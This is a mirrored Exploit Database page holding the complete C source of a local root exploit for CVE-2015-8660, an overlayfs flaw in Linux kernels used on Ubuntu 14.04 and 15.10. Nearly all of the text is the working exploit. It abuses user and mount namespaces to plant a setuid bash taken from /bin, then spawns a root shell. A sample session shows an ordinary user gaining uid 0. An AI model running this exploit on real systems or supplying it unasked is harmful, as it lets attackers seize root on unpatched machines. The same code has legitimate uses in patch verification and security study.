Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) – ‘overlayfs’ Local Privilege Escalation (1)

• Exploit Database
• 37 阅读

• 作者： rebel
  日期： 2016-01-05
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39166/

• /*
  just another overlayfs exploit, works on kernels before 2015-12-26
  
  # Exploit Title: overlayfs local root
  # Date: 2016-01-05
  # Exploit Author: rebel
  # Version: Ubuntu 14.04 LTS, 15.10 and more
  # Tested on: Ubuntu 14.04 LTS, 15.10
  # CVE : CVE-2015-8660
  
  blah@ubuntu:~$ id
  uid=1001(blah) gid=1001(blah) groups=1001(blah)
  blah@ubuntu:~$ uname -a && cat /etc/issue
  Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  Ubuntu 14.04.3 LTS \n \l
  blah@ubuntu:~$ ./overlayfail
  root@ubuntu:~# id
  uid=0(root) gid=1001(blah) groups=0(root),1001(blah)
  
  12/2015
  by rebel
  
  6354b4e23db225b565d79f226f2e49ec0fe1e19b
  */
  
  #include <stdio.h>
  #include <sched.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <sched.h>
  #include <sys/stat.h>
  #include <sys/types.h>
  #include <sys/mount.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <sched.h>
  #include <sys/stat.h>
  #include <sys/types.h>
  #include <sys/mount.h>
  #include <sys/types.h>
  #include <signal.h>
  #include <fcntl.h>
  #include <string.h>
  #include <linux/sched.h>
  #include <sys/wait.h>
  
  static char child_stack[1024*1024];
  
  static int
  child_exec(void *stuff)
  {
  system("rm -rf /tmp/haxhax");
  mkdir("/tmp/haxhax", 0777);
  mkdir("/tmp/haxhax/w", 0777);
  mkdir("/tmp/haxhax/u",0777);
  mkdir("/tmp/haxhax/o",0777);
  
  if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
  	fprintf(stderr,"mount failed..\n");
  }
  
  chmod("/tmp/haxhax/w/work",0777);
  chdir("/tmp/haxhax/o");
  chmod("bash",04755);
  chdir("/");
  umount("/tmp/haxhax/o");
  return 0;
  }
  
  int
  main(int argc, char **argv)
  {
  int status;
  pid_t wrapper, init;
  int clone_flags = CLONE_NEWNS | SIGCHLD;
  struct stat s;
  
  if((wrapper = fork()) == 0) {
  if(unshare(CLONE_NEWUSER) != 0)
  fprintf(stderr, "failed to create new user namespace\n");
  
  if((init = fork()) == 0) {
  pid_t pid =
  clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
  if(pid < 0) {
  fprintf(stderr, "failed to create new mount namespace\n");
  exit(-1);
  }
  
  waitpid(pid, &status, 0);
  
  }
  
  waitpid(init, &status, 0);
  return 0;
  }
  
  usleep(300000);
  
  wait(NULL);
  
  stat("/tmp/haxhax/u/bash",&s);
  
  if(s.st_mode == 0x89ed)
  execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
  
  fprintf(stderr,"couldn't create suid :(\n");
  return -1;
  }